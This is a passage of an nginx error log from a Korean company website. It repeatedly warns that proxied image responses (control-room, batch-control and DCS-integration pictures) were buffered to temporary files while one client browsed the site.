/var/cache/nginx/proxy_temp/2/96/0000010962 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000010963 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000010964 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000010965 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000010966 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:07:48 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/96/0000010967 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/96/0000010968 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/96/0000010969 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000010970 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:58:34 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000010971 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000010972 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000010973 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000010974 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000010975 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000010976 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000010977 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000010978 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:10:35 [warn] 895#895: *40101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000010979 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:10:35 [warn] 895#895: *40101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000010980 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000010981 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000010982 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000010983 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000010984 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000010985 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000010986 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:26:26 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000010987 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000010988 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000010989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000010990 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000010991 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:28:31 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000010992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:28:31 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000010993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:28:32 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000010994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000010995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000010996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000010997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:41:23 [warn] 898#898: *40229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000010998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:41:23 [warn] 898#898: *40229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000010999 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000011000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000011001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000011002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000011003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:54:48 [warn] 898#898: *40259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000011004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:54:48 [warn] 898#898: *40259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000011005 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000011006 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000011007 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000011008 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000011009 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000011010 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000011011 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000011012 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000011013 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000011014 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000011015 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000011016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000011017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:31:21 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000011018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000011028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000011029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000011030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/03/0000011031 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000011032 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000011033 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:57:08 [warn] 901#901: *40550 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/03/0000011034 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/03/0000011035 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/03/0000011036 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/03/0000011037 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000011038 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000011039 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:03:46 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000011040 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000011041 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file 